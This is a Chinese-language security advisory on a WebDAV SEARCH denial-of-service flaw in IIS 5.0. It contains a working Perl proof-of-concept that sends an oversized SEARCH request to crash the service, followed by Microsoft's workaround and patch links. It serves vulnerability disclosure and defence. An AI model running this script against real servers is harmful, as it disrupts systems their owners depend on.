IIS 5.0 SEARCH 方法远程攻击漏洞

/ns/ld/win/data/20010720222805.htm

IIS 5.0 SEARCH 方法远程攻击漏洞



受影响的系统:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
描述:
--------------------------------------------------------------------------------


WebDAV是HTTP协议的扩展,允许从远程来编写和管理Web内容。微软IIS 5.0的WebDAV在
处理某些畸形的请求时存在缺陷,当提交一个超长的SEARCH请求时可以使IIS 服务重启。

<* 来源: Georgi Guninski (guninski@GUNINSKI.COM)
http://www.guninski.com
*>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Georgi Guninski (guninski@GUNINSKI.COM)提供了如下测试代码:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns="DAV:"><D:sql>SELECT DAVisplayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

--------------------------------------------------------------------------------
建议:

临时解决方法:

微软给出一个禁止WebDAV的临时解决办法(http://www.microsoft.com/technet/support/kb.asp?ID=241520):
1、先停止IIS服务。可以在命令行下敲“IISRESET /STOP”命令。
2、禁止everyone访问Httpext.dll:
CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
3、再启动IIS服务:IISRESET /START

厂商补丁:

微软已经为此发布了一个安全公告(MS-016):
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp

补丁程序(目前只有英文版):

Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564